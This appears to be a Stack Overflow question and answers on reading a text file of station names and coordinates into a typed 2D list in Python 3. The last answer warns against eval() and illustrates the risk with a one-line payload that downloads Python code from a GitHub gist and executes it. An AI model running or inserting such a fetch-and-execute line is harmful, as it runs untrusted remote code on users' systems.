3

I am quite new to programming. I want to read a data file and store it as a 2d Array in python3 so that I can operate on the single elements. I am using the following method to read in the file:

with open("text.txt", "r") as text:
    lines = [line.split() for line in text]

This however parses everything as text. How can I read in a file whilst maintaining the data types (text parsing as text, ints as ints and floats as floats, etc)? The input file looks something like this:

HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714
  • Can't you do it after? (transforming strings in `str` or float)? – Clodion Jul 27 '15 at 09:51
  • [Method for guessing type of data represented currently represented as strings in python](http://stackoverflow.com/questions/3098337/method-for-guessing-type-of-data-represented-currently-represented-as-strings-in) – Delgan Jul 27 '15 at 09:51

2 Answers2

1

Is this what you want

import ast
with open("1.txt","r") as inp:
    c= [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split()   ]

output:

print c
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print c[1],type(c[1])
4973168.84 <type 'float'>

you can not directly apply as.literal_eval() on string arguments.since it removes quotes of the arguments

i.e)

ast.literal_eval("as")
File "<unknown>", line 1
    as
    ^
SyntaxError: unexpected EOF while parsing


ast.literal_eval('"as"')
'as'

Edit:

To get it as a 2-d array:

import ast
with open("1.txt","r") as inp:
    c= [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split() ]  for line in inp  ]

output:

print c
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]
The6thSense
  • 8,103
  • 8
  • 31
  • 65
1

Usually, you should be expecting a specific datatype for rows, columns or specific cells. In your case, that would be a string in every first cell of a row and numbers following in all other cells.

data = []
with open('text.txt', 'r') as fp:
  for line in (l.split() for l in fp):
    line[1:] = [float(x) for x in line[1:]]
    data.append(line)

If you really just want to convert every cell to the nearest applicable datatype, you could use a function like this and apply it on every cell in the 2D list.

def nearest_applicable_conversion(x):
  try:
    return int(x)
  except ValueError:
    pass
  try:
    return float(x)
  except ValueError:
    pass
  return x

I highly discourage you to use eval() as it will evaluate any valid Python code and makes your system vulnerable to attacks to those that know how to do it. I could easily execute arbitrary code by putting the following code into one of the cells that you eval() from text.txt, I just have to make sure it contains no whitespace as that would make the code split in multiple cells:

(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()
Niklas R
  • 16,299
  • 28
  • 108
  • 203